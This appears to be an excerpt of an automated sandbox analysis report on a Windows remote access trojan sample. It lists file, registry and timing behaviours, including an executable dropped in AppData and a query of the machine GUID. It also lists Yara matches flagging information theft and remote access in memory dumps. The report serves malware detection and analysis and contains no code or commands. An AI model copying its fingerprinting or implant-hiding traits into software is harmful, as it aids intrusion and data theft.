Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00726735 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 15_2_00726735
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY